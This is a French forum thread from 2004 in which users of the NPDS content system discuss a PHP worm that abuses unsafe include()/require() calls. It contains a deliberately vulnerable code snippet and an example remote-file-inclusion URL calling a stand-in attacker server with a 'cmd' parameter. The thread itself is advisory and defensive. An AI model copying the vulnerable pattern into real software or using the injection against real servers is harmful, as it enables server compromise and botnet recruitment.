|
Cats 75
| Posté : 27-12-2004 05:14
Le nouveau ver Php!include!.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias "Php!include!.Worm"].
Contrairement à Santy, Php!include!.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "!include!()" et "require()" de façon non-sécurisée. Comment ?
Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :
-------- Exemple : vulnerable.php --------
if(isset($page))
{
!include!($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses
Php!include!.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.
Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.
Sources : k-otik
Qu'en est-il de NPDS ? |  Profil www
|
|
webservor 1856
| Posté : 27-12-2004 08:57
je sais que la fct !include!() est très sécurisée dans NPDs / dev ? |  Profil
|
|
Fix 624
| Posté : 27-12-2004 14:24
sur npds ok mais dans les modules, y'a pas des !include!s tout frais tout dispo pour les hackers?
ceci dit, il faut aussi tomber sur la bonne variable, on utilise pas forcement $page |  Profil E-mail www
|
|
Cats 75
| Posté : 27-12-2004 14:31
Yep, mais je répète : Php!!include!!.Worm recherche des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies... et ça, ça ne manque pas !!! |  Profil www
|
|
developpeur 24581
| Posté : 27-12-2004 21:38
un filtre activé sur npds.org sera bientot publié pour "contrer" cette petite bête !
Ceci étant santy.c surcharge beaucoup la machina ... et c'est pas cool non plus |  Profil E-mail www
|
|